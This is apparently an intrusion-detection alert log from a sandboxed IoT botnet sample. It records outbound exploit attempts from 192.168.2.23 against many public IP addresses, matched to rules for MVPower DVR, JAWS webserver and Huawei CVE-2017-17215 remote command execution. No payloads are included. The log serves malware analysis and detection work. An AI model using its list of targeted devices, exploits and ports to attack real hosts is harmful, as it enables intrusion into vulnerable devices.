                                                            192.168.2.23108.156.251.23339180802025883 01/26/24-15:32:21.585684TCP2025883ET EXPLOIT MVPower DVR Shell UCE3918080192.168.2.23108.156.251.233
                                                            192.168.2.2377.79.225.8552098802025883 01/26/24-15:32:53.764720TCP2025883ET EXPLOIT MVPower DVR Shell UCE5209880192.168.2.2377.79.225.85
                                                            192.168.2.23181.117.207.4133702802025883 01/26/24-15:32:42.866946TCP2025883ET EXPLOIT MVPower DVR Shell UCE3370280192.168.2.23181.117.207.41
                                                            192.168.2.23172.255.248.15041094802025883 01/26/24-15:33:01.959349TCP2025883ET EXPLOIT MVPower DVR Shell UCE4109480192.168.2.23172.255.248.150
                                                            192.168.2.23185.92.244.18134746802025883 01/26/24-15:31:36.457097TCP2025883ET EXPLOIT MVPower DVR Shell UCE3474680192.168.2.23185.92.244.181
                                                            192.168.2.23159.223.194.13638908802030092 01/26/24-15:31:49.498703TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3890880192.168.2.23159.223.194.136
                                                            192.168.2.2320.4.150.15357706802030092 01/26/24-15:32:01.649352TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5770680192.168.2.2320.4.150.153
                                                            192.168.2.2313.245.236.18635174802030092 01/26/24-15:31:33.077577TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3517480192.168.2.2313.245.236.186
                                                            192.168.2.23148.139.122.14443836802025883 01/26/24-15:31:43.859827TCP2025883ET EXPLOIT MVPower DVR Shell UCE4383680192.168.2.23148.139.122.144
                                                            192.168.2.2352.16.167.22043164802025883 01/26/24-15:31:52.881132TCP2025883ET EXPLOIT MVPower DVR Shell UCE4316480192.168.2.2352.16.167.220
                                                            192.168.2.2363.32.147.23747406802030092 01/26/24-15:32:33.778960TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4740680192.168.2.2363.32.147.237
                                                            192.168.2.23156.254.80.7051952372152835222 01/26/24-15:31:47.724803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5195237215192.168.2.23156.254.80.70
                                                            192.168.2.235.152.238.536550802025883 01/26/24-15:32:07.844825TCP2025883ET EXPLOIT MVPower DVR Shell UCE3655080192.168.2.235.152.238.5
                                                            192.168.2.23104.107.160.19948622802025883 01/26/24-15:31:52.877494TCP2025883ET EXPLOIT MVPower DVR Shell UCE4862280192.168.2.23104.107.160.199
                                                            192.168.2.23144.196.51.22148752802025883 01/26/24-15:31:36.579593TCP2025883ET EXPLOIT MVPower DVR Shell UCE4875280192.168.2.23144.196.51.221
                                                            192.168.2.23154.81.106.11046190802030092 01/26/24-15:32:35.690212TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4619080192.168.2.23154.81.106.110
                                                            192.168.2.2318.194.17.17646016802030092 01/26/24-15:31:41.778567TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4601680192.168.2.2318.194.17.176
                                                            192.168.2.23194.164.49.7760720802030092 01/26/24-15:32:58.944458TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6072080192.168.2.23194.164.49.77
                                                            192.168.2.23212.51.159.2051022802030092 01/26/24-15:31:49.555601TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5102280192.168.2.23212.51.159.20
                                                            192.168.2.232.21.165.21938134802025883 01/26/24-15:31:12.259896TCP2025883ET EXPLOIT MVPower DVR Shell UCE3813480192.168.2.232.21.165.219
                                                            192.168.2.23212.76.114.21245362802025883 01/26/24-15:31:26.866788TCP2025883ET EXPLOIT MVPower DVR Shell UCE4536280192.168.2.23212.76.114.212
                                                            192.168.2.2377.70.177.5053098802030092 01/26/24-15:31:41.363987TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5309880192.168.2.2377.70.177.50
                                                            192.168.2.2369.90.160.25452410802025883 01/26/24-15:31:23.708076TCP2025883ET EXPLOIT MVPower DVR Shell UCE5241080192.168.2.2369.90.160.254
                                                            192.168.2.23156.241.13.3739998372152835222 01/26/24-15:32:46.480373TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3999837215192.168.2.23156.241.13.37
                                                            192.168.2.23202.143.87.21234310802025883 01/26/24-15:32:53.578197TCP2025883ET EXPLOIT MVPower DVR Shell UCE3431080192.168.2.23202.143.87.212
                                                            192.168.2.2313.35.117.24748038802025883 01/26/24-15:31:01.184559TCP2025883ET EXPLOIT MVPower DVR Shell UCE4803880192.168.2.2313.35.117.247
                                                            192.168.2.2327.74.199.24149786802025883 01/26/24-15:32:36.350234TCP2025883ET EXPLOIT MVPower DVR Shell UCE4978680192.168.2.2327.74.199.241
                                                            192.168.2.2323.235.205.3858374802025883 01/26/24-15:31:12.588509TCP2025883ET EXPLOIT MVPower DVR Shell UCE5837480192.168.2.2323.235.205.38
                                                            192.168.2.2349.4.64.19534308802030092 01/26/24-15:32:47.774923TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3430880192.168.2.2349.4.64.195
                                                            192.168.2.23156.224.143.2355066802025883 01/26/24-15:32:18.476218TCP2025883ET EXPLOIT MVPower DVR Shell UCE5506680192.168.2.23156.224.143.23
                                                            192.168.2.23102.219.77.14835116802030092 01/26/24-15:32:02.052414TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3511680192.168.2.23102.219.77.148
                                                            192.168.2.23186.39.102.20842590802025883 01/26/24-15:32:18.363395TCP2025883ET EXPLOIT MVPower DVR Shell UCE4259080192.168.2.23186.39.102.208
                                                            192.168.2.23185.16.89.24148104802025883 01/26/24-15:32:01.351918TCP2025883ET EXPLOIT MVPower DVR Shell UCE4810480192.168.2.23185.16.89.241
                                                            192.168.2.23101.33.8.22849264802025883 01/26/24-15:32:14.795065TCP2025883ET EXPLOIT MVPower DVR Shell UCE4926480192.168.2.23101.33.8.228
                                                            192.168.2.2320.240.179.11142334802030092 01/26/24-15:32:04.835960TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4233480192.168.2.2320.240.179.111
                                                            192.168.2.2346.21.77.21937442802030092 01/26/24-15:32:42.019949TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3744280192.168.2.2346.21.77.219
                                                            192.168.2.2380.211.121.12436946802025883 01/26/24-15:31:44.072128TCP2025883ET EXPLOIT MVPower DVR Shell UCE3694680192.168.2.2380.211.121.124
                                                            192.168.2.2320.157.170.4946164802030092 01/26/24-15:31:18.152180TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4616480192.168.2.2320.157.170.49
                                                            192.168.2.23184.94.157.20458528802030092 01/26/24-15:32:30.542967TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5852880192.168.2.23184.94.157.204
                                                            192.168.2.2388.221.30.22749674802030092 01/26/24-15:32:47.925102TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4967480192.168.2.2388.221.30.227
                                                            192.168.2.2347.135.166.18335540802025883 01/26/24-15:31:52.672906TCP2025883ET EXPLOIT MVPower DVR Shell UCE3554080192.168.2.2347.135.166.183
                                                            192.168.2.23146.148.208.21340780802030092 01/26/24-15:31:43.740162TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4078080192.168.2.23146.148.208.213
                                                            192.168.2.2323.59.184.24640766802030092 01/26/24-15:31:53.132854TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4076680192.168.2.2323.59.184.246
                                                            192.168.2.23108.157.169.2641948802025883 01/26/24-15:31:01.192186TCP2025883ET EXPLOIT MVPower DVR Shell UCE4194880192.168.2.23108.157.169.26
                                                            192.168.2.2394.123.190.4158916802030092 01/26/24-15:32:44.993645TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5891680192.168.2.2394.123.190.41
                                                            192.168.2.2323.207.85.2538660802030092 01/26/24-15:31:36.980434TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3866080192.168.2.2323.207.85.25
                                                            192.168.2.2323.15.47.8338132802030092 01/26/24-15:32:28.552407TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3813280192.168.2.2323.15.47.83
                                                            192.168.2.23156.224.13.5541862372152829579 01/26/24-15:33:01.135581TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4186237215192.168.2.23156.224.13.55
                                                            192.168.2.23207.58.183.942880802025883 01/26/24-15:31:01.067805TCP2025883ET EXPLOIT MVPower DVR Shell UCE4288080192.168.2.23207.58.183.9
                                                            192.168.2.2323.194.56.7436204802030092 01/26/24-15:32:14.932098TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3620480192.168.2.2323.194.56.74
                                                            192.168.2.2352.56.104.8535924802025883 01/26/24-15:32:41.945134TCP2025883ET EXPLOIT MVPower DVR Shell UCE3592480192.168.2.2352.56.104.85
                                                            192.168.2.23192.169.174.23060688802025883 01/26/24-15:31:01.265787TCP2025883ET EXPLOIT MVPower DVR Shell UCE6068880192.168.2.23192.169.174.230
                                                            192.168.2.23223.119.221.2845936802030092 01/26/24-15:32:42.152481TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4593680192.168.2.23223.119.221.28
                                                            192.168.2.23139.9.139.4446194802025883 01/26/24-15:31:53.004488TCP2025883ET EXPLOIT MVPower DVR Shell UCE4619480192.168.2.23139.9.139.44
                                                            192.168.2.23162.144.71.10436660802025883 01/26/24-15:32:04.770717TCP2025883ET EXPLOIT MVPower DVR Shell UCE3666080192.168.2.23162.144.71.104
                                                            192.168.2.2335.247.250.10957112802025883 01/26/24-15:31:01.808664TCP2025883ET EXPLOIT MVPower DVR Shell UCE5711280192.168.2.2335.247.250.109
                                                            192.168.2.2352.26.29.20958962802025883 01/26/24-15:32:32.545697TCP2025883ET EXPLOIT MVPower DVR Shell UCE5896280192.168.2.2352.26.29.209
                                                            192.168.2.23198.1.91.2538456802025883 01/26/24-15:32:06.600510TCP2025883ET EXPLOIT MVPower DVR Shell UCE3845680192.168.2.23198.1.91.25
                                                            192.168.2.238.130.31.21353132802025883 01/26/24-15:31:51.441434TCP2025883ET EXPLOIT MVPower DVR Shell UCE5313280192.168.2.238.130.31.213
                                                            192.168.2.23107.148.114.6555240802030092 01/26/24-15:31:18.915143TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5524080192.168.2.23107.148.114.65
                                                            192.168.2.2341.111.206.21744778802030092 01/26/24-15:31:53.908579TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4477880192.168.2.2341.111.206.217
                                                            192.168.2.2334.160.251.13143950802030092 01/26/24-15:32:36.823697TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4395080192.168.2.2334.160.251.131
                                                            192.168.2.23212.107.17.5343562802025883 01/26/24-15:31:20.948534TCP2025883ET EXPLOIT MVPower DVR Shell UCE4356280192.168.2.23212.107.17.53
                                                            192.168.2.2374.126.94.2437582802025883 01/26/24-15:31:51.555751TCP2025883ET EXPLOIT MVPower DVR Shell UCE3758280192.168.2.2374.126.94.24
                                                            192.168.2.2392.204.202.2359382802030092 01/26/24-15:32:18.333463TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5938280192.168.2.2392.204.202.23
                                                            192.168.2.2389.41.249.20560208802025883 01/26/24-15:32:44.750284TCP2025883ET EXPLOIT MVPower DVR Shell UCE6020880192.168.2.2389.41.249.205
                                                            192.168.2.23125.141.214.17657886802030092 01/26/24-15:31:27.982300TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5788680192.168.2.23125.141.214.176
                                                            192.168.2.23188.128.228.2952124802030092 01/26/24-15:32:18.599331TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5212480192.168.2.23188.128.228.29
                                                            192.168.2.23200.51.44.25439076802030092 01/26/24-15:31:23.573871TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3907680192.168.2.23200.51.44.254
                                                            192.168.2.23156.244.93.14353710802025883 01/26/24-15:31:55.700501TCP2025883ET EXPLOIT MVPower DVR Shell UCE5371080192.168.2.23156.244.93.143
                                                            192.168.2.23156.241.121.355228372152829579 01/26/24-15:31:35.990854TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5522837215192.168.2.23156.241.121.3
                                                            192.168.2.2323.58.241.8340892802030092 01/26/24-15:32:25.540390TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4089280192.168.2.2323.58.241.83
                                                            192.168.2.2345.135.232.545120802025883 01/26/24-15:31:13.845208TCP2025883ET EXPLOIT MVPower DVR Shell UCE4512080192.168.2.2345.135.232.5
                                                            192.168.2.2320.93.126.9855832802025883 01/26/24-15:33:00.496099TCP2025883ET EXPLOIT MVPower DVR Shell UCE5583280192.168.2.2320.93.126.98
                                                            192.168.2.23151.205.173.3258482802030092 01/26/24-15:32:47.726111TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5848280192.168.2.23151.205.173.32
                                                            192.168.2.23109.104.144.9857384802030092 01/26/24-15:31:52.901761TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5738480192.168.2.23109.104.144.98
                                                            192.168.2.23183.255.117.4441112802030092 01/26/24-15:32:40.101073TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4111280192.168.2.23183.255.117.44
                                                            192.168.2.23172.121.187.15151508802030092 01/26/24-15:32:47.613814TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5150880192.168.2.23172.121.187.151
                                                            192.168.2.2351.222.111.20141192802025883 01/26/24-15:31:23.456384TCP2025883ET EXPLOIT MVPower DVR Shell UCE4119280192.168.2.2351.222.111.201
                                                            192.168.2.23156.77.134.8238044372152835222 01/26/24-15:31:52.879041TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3804437215192.168.2.23156.77.134.82
                                                            192.168.2.23143.204.96.6033308802025883 01/26/24-15:32:18.732902TCP2025883ET EXPLOIT MVPower DVR Shell UCE3330880192.168.2.23143.204.96.60
                                                            192.168.2.2323.201.134.2259708802030092 01/26/24-15:32:30.795973TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5970880192.168.2.2323.201.134.22
                                                            192.168.2.23188.51.163.7635892802030092 01/26/24-15:31:12.594146TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3589280192.168.2.23188.51.163.76
                                                            192.168.2.23133.223.33.19153554802025883 01/26/24-15:32:25.532569TCP2025883ET EXPLOIT MVPower DVR Shell UCE5355480192.168.2.23133.223.33.191
                                                            192.168.2.2318.164.249.7846800802030092 01/26/24-15:31:01.375993TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4680080192.168.2.2318.164.249.78
                                                            192.168.2.2391.220.229.24957652802030092 01/26/24-15:31:44.826702TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5765280192.168.2.2391.220.229.249
                                                            192.168.2.2347.246.10.10051612802030092 01/26/24-15:32:19.110765TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5161280192.168.2.2347.246.10.100
                                                            192.168.2.23104.24.90.8534596802030092 01/26/24-15:32:25.541697TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3459680192.168.2.23104.24.90.85
                                                            192.168.2.2323.201.56.17747892802025883 01/26/24-15:33:01.783768TCP2025883ET EXPLOIT MVPower DVR Shell UCE4789280192.168.2.2323.201.56.177
                                                            192.168.2.2334.199.210.5146056802030092 01/26/24-15:31:23.425405TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4605680192.168.2.2334.199.210.51
                                                            192.168.2.23116.62.71.21539852802030092 01/26/24-15:32:01.559265TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3985280192.168.2.23116.62.71.215
                                                            192.168.2.23178.16.125.7852530802025883 01/26/24-15:31:26.836533TCP2025883ET EXPLOIT MVPower DVR Shell UCE5253080192.168.2.23178.16.125.78
                                                            192.168.2.23198.1.91.2538456802030092 01/26/24-15:32:06.600510TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3845680192.168.2.23198.1.91.25
                                                            192.168.2.23128.199.1.7957134802030092 01/26/24-15:32:44.664038TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5713480192.168.2.23128.199.1.79
                                                            192.168.2.2350.118.154.12242678802025883 01/26/24-15:32:56.776146TCP2025883ET EXPLOIT MVPower DVR Shell UCE4267880192.168.2.2350.118.154.122
                                                            192.168.2.23167.114.61.3959674802030092 01/26/24-15:31:12.402679TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5967480192.168.2.23167.114.61.39
                                                            192.168.2.2335.247.250.10957112802030092 01/26/24-15:31:01.808664TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5711280192.168.2.2335.247.250.109
                                                            192.168.2.23194.53.176.10136592802025883 01/26/24-15:32:25.792214TCP2025883ET EXPLOIT MVPower DVR Shell UCE3659280192.168.2.23194.53.176.101
                                                            192.168.2.2313.249.180.19955930802025883 01/26/24-15:31:30.559266TCP2025883ET EXPLOIT MVPower DVR Shell UCE5593080192.168.2.2313.249.180.199
                                                            192.168.2.23162.155.183.19344666802030092 01/26/24-15:32:11.781834TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4466680192.168.2.23162.155.183.193
                                                            192.168.2.23130.254.45.11260120802025883 01/26/24-15:31:41.456093TCP2025883ET EXPLOIT MVPower DVR Shell UCE6012080192.168.2.23130.254.45.112
                                                            192.168.2.23188.128.228.2952124802025883 01/26/24-15:32:18.599331TCP2025883ET EXPLOIT MVPower DVR Shell UCE5212480192.168.2.23188.128.228.29
                                                            192.168.2.2341.89.94.8436374802025883 01/26/24-15:32:34.782595TCP2025883ET EXPLOIT MVPower DVR Shell UCE3637480192.168.2.2341.89.94.84
                                                            192.168.2.23187.192.184.22845648802025883 01/26/24-15:32:06.859488TCP2025883ET EXPLOIT MVPower DVR Shell UCE4564880192.168.2.23187.192.184.228
                                                            192.168.2.2313.91.138.12738430802030092 01/26/24-15:31:49.499486TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3843080192.168.2.2313.91.138.127
                                                            192.168.2.2350.228.145.13334136802030092 01/26/24-15:32:35.806433TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3413680192.168.2.2350.228.145.133
                                                            192.168.2.2351.222.111.20141192802030092 01/26/24-15:31:23.456384TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4119280192.168.2.2351.222.111.201
                                                            192.168.2.23122.116.234.20733582802025883 01/26/24-15:31:51.956820TCP2025883ET EXPLOIT MVPower DVR Shell UCE3358280192.168.2.23122.116.234.207
                                                            192.168.2.235.23.53.20254988802030092 01/26/24-15:31:58.910288TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5498880192.168.2.235.23.53.202
                                                            192.168.2.23211.149.134.21350172802025883 01/26/24-15:32:13.187329TCP2025883ET EXPLOIT MVPower DVR Shell UCE5017280192.168.2.23211.149.134.213
                                                            192.168.2.23217.92.132.15052322802030092 01/26/24-15:31:37.944780TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5232280192.168.2.23217.92.132.150
                                                            192.168.2.23184.24.189.6247104802025883 01/26/24-15:31:37.924300TCP2025883ET EXPLOIT MVPower DVR Shell UCE4710480192.168.2.23184.24.189.62
                                                            192.168.2.23185.133.20.854662802030092 01/26/24-15:32:19.590376TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5466280192.168.2.23185.133.20.8
                                                            192.168.2.23191.101.131.2144710802025883 01/26/24-15:31:49.579489TCP2025883ET EXPLOIT MVPower DVR Shell UCE4471080192.168.2.23191.101.131.21
                                                            192.168.2.23104.77.235.19258712802025883 01/26/24-15:31:41.620325TCP2025883ET EXPLOIT MVPower DVR Shell UCE5871280192.168.2.23104.77.235.192
                                                            192.168.2.23164.42.149.25243066802025883 01/26/24-15:32:14.712104TCP2025883ET EXPLOIT MVPower DVR Shell UCE4306680192.168.2.23164.42.149.252
                                                            192.168.2.23221.194.131.8758524802030092 01/26/24-15:31:41.925411TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5852480192.168.2.23221.194.131.87
                                                            192.168.2.23163.5.192.9652060802030092 01/26/24-15:32:41.706916TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5206080192.168.2.23163.5.192.96
                                                            192.168.2.23156.254.87.6340596372152835222 01/26/24-15:32:52.520635TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4059637215192.168.2.23156.254.87.63
                                                            192.168.2.23188.51.163.7635892802025883 01/26/24-15:31:12.594146TCP2025883ET EXPLOIT MVPower DVR Shell UCE3589280192.168.2.23188.51.163.76
                                                            192.168.2.2374.208.140.12337336802030092 01/26/24-15:32:11.570526TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3733680192.168.2.2374.208.140.123
                                                            192.168.2.2341.44.41.6749362372152829579 01/26/24-15:31:52.468921TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4936237215192.168.2.2341.44.41.67
                                                            192.168.2.23209.206.59.8743802802030092 01/26/24-15:32:18.540220TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4380280192.168.2.23209.206.59.87
                                                            192.168.2.23149.12.212.5233460802025883 01/26/24-15:31:35.603929TCP2025883ET EXPLOIT MVPower DVR Shell UCE3346080192.168.2.23149.12.212.52
                                                            192.168.2.2334.96.71.2541004802030092 01/26/24-15:32:39.548469TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4100480192.168.2.2334.96.71.25
                                                            192.168.2.2323.192.184.1243988802030092 01/26/24-15:31:55.842282TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4398880192.168.2.2323.192.184.12
                                                            192.168.2.23217.73.134.19745198802030092 01/26/24-15:31:04.288934TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4519880192.168.2.23217.73.134.197
                                                            192.168.2.2393.179.30.21356902802025883 01/26/24-15:32:15.908806TCP2025883ET EXPLOIT MVPower DVR Shell UCE5690280192.168.2.2393.179.30.213
                                                            192.168.2.2347.100.202.11756470802030092 01/26/24-15:32:45.243255TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5647080192.168.2.2347.100.202.117
                                                            192.168.2.2354.201.62.19056696802025883 01/26/24-15:31:23.776945TCP2025883ET EXPLOIT MVPower DVR Shell UCE5669680192.168.2.2354.201.62.190
                                                            192.168.2.23104.17.247.18641598802025883 01/26/24-15:32:11.557512TCP2025883ET EXPLOIT MVPower DVR Shell UCE4159880192.168.2.23104.17.247.186
                                                            192.168.2.23103.67.246.15955592802025883 01/26/24-15:32:11.805602TCP2025883ET EXPLOIT MVPower DVR Shell UCE5559280192.168.2.23103.67.246.159
                                                            192.168.2.2395.216.144.14242362802030092 01/26/24-15:32:39.873221TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4236280192.168.2.2395.216.144.142
                                                            192.168.2.23211.25.120.21259646802025883 01/26/24-15:33:01.663963TCP2025883ET EXPLOIT MVPower DVR Shell UCE5964680192.168.2.23211.25.120.212
                                                            192.168.2.2334.66.136.20042328802025883 01/26/24-15:31:23.711502TCP2025883ET EXPLOIT MVPower DVR Shell UCE4232880192.168.2.2334.66.136.200
                                                            192.168.2.2374.57.213.2047822802030092 01/26/24-15:32:25.423381TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4782280192.168.2.2374.57.213.20
                                                            192.168.2.23173.232.181.21650596802025883 01/26/24-15:32:11.559221TCP2025883ET EXPLOIT MVPower DVR Shell UCE5059680192.168.2.23173.232.181.216
                                                            192.168.2.2323.49.33.2453916802025883 01/26/24-15:31:30.578429TCP2025883ET EXPLOIT MVPower DVR Shell UCE5391680192.168.2.2323.49.33.24
                                                            192.168.2.238.217.167.1952856802030092 01/26/24-15:32:04.936288TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5285680192.168.2.238.217.167.19
                                                            192.168.2.2351.89.136.11539608802025883 01/26/24-15:32:18.378722TCP2025883ET EXPLOIT MVPower DVR Shell UCE3960880192.168.2.2351.89.136.115
                                                            192.168.2.23111.51.104.23142972802025883 01/26/24-15:32:25.692850TCP2025883ET EXPLOIT MVPower DVR Shell UCE4297280192.168.2.23111.51.104.231
                                                            192.168.2.23108.156.62.15748266802030092 01/26/24-15:31:04.249083TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4826680192.168.2.23108.156.62.157
                                                            192.168.2.23208.106.233.17852066802025883 01/26/24-15:31:47.689173TCP2025883ET EXPLOIT MVPower DVR Shell UCE5206680192.168.2.23208.106.233.178
                                                            192.168.2.23152.0.245.2048074802030092 01/26/24-15:32:50.653183TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4807480192.168.2.23152.0.245.20
                                                            192.168.2.23121.189.159.847844802025883 01/26/24-15:31:27.210827TCP2025883ET EXPLOIT MVPower DVR Shell UCE4784480192.168.2.23121.189.159.8
                                                            192.168.2.23120.53.232.13745462802030092 01/26/24-15:32:20.034063TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4546280192.168.2.23120.53.232.137
                                                            192.168.2.2334.128.166.8250578802030092 01/26/24-15:32:25.383055TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5057880192.168.2.2334.128.166.82
                                                            192.168.2.2365.110.67.446906802030092 01/26/24-15:31:49.655535TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4690680192.168.2.2365.110.67.4
                                                            192.168.2.23184.94.157.20458528802025883 01/26/24-15:32:30.542967TCP2025883ET EXPLOIT MVPower DVR Shell UCE5852880192.168.2.23184.94.157.204
                                                            192.168.2.2379.129.85.4050426802025883 01/26/24-15:32:53.836183TCP2025883ET EXPLOIT MVPower DVR Shell UCE5042680192.168.2.2379.129.85.40
                                                            192.168.2.2360.43.214.23137832802025883 01/26/24-15:31:51.435831TCP2025883ET EXPLOIT MVPower DVR Shell UCE3783280192.168.2.2360.43.214.231
                                                            192.168.2.2318.194.17.17646016802025883 01/26/24-15:31:41.778567TCP2025883ET EXPLOIT MVPower DVR Shell UCE4601680192.168.2.2318.194.17.176
                                                            192.168.2.23106.75.143.13134368802025883 01/26/24-15:32:50.178295TCP2025883ET EXPLOIT MVPower DVR Shell UCE3436880192.168.2.23106.75.143.131
                                                            192.168.2.23195.87.80.16555956802025883 01/26/24-15:31:44.820074TCP2025883ET EXPLOIT MVPower DVR Shell UCE5595680192.168.2.23195.87.80.165
                                                            192.168.2.23196.205.27.22641806802030092 01/26/24-15:32:04.941163TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4180680192.168.2.23196.205.27.226
                                                            192.168.2.23197.246.107.15135100372152835222 01/26/24-15:32:53.792661TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3510037215192.168.2.23197.246.107.151
                                                            192.168.2.23103.21.224.21237054802025883 01/26/24-15:32:07.991335TCP2025883ET EXPLOIT MVPower DVR Shell UCE3705480192.168.2.23103.21.224.212
                                                            192.168.2.23182.23.12.2637814802030092 01/26/24-15:32:19.158178TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3781480192.168.2.23182.23.12.26
                                                            192.168.2.23119.3.220.6855482802025883 01/26/24-15:32:38.736141TCP2025883ET EXPLOIT MVPower DVR Shell UCE5548280192.168.2.23119.3.220.68
                                                            192.168.2.2372.21.26.10841576802025883 01/26/24-15:33:00.470464TCP2025883ET EXPLOIT MVPower DVR Shell UCE4157680192.168.2.2372.21.26.108
                                                            192.168.2.23108.157.169.2641948802030092 01/26/24-15:31:01.192186TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4194880192.168.2.23108.157.169.26
                                                            192.168.2.23201.0.234.4241126802025883 01/26/24-15:31:33.229715TCP2025883ET EXPLOIT MVPower DVR Shell UCE4112680192.168.2.23201.0.234.42
                                                            192.168.2.2350.19.0.15341852802030092 01/26/24-15:32:35.511583TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4185280192.168.2.2350.19.0.153
                                                            192.168.2.23201.28.145.11459922802030092 01/26/24-15:31:26.850722TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5992280192.168.2.23201.28.145.114
                                                            192.168.2.23156.241.113.2943492372152835222 01/26/24-15:31:35.972751TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4349237215192.168.2.23156.241.113.29
                                                            192.168.2.23173.29.24.18733044802025883 01/26/24-15:31:43.748280TCP2025883ET EXPLOIT MVPower DVR Shell UCE3304480192.168.2.23173.29.24.187
                                                            192.168.2.23119.207.31.17746712802025883 01/26/24-15:31:41.495556TCP2025883ET EXPLOIT MVPower DVR Shell UCE4671280192.168.2.23119.207.31.177
                                                            192.168.2.2352.87.15.13548334802030092 01/26/24-15:32:19.584226TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4833480192.168.2.2352.87.15.135
                                                            192.168.2.23197.246.45.20139758372152835222 01/26/24-15:32:04.352629TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3975837215192.168.2.23197.246.45.201
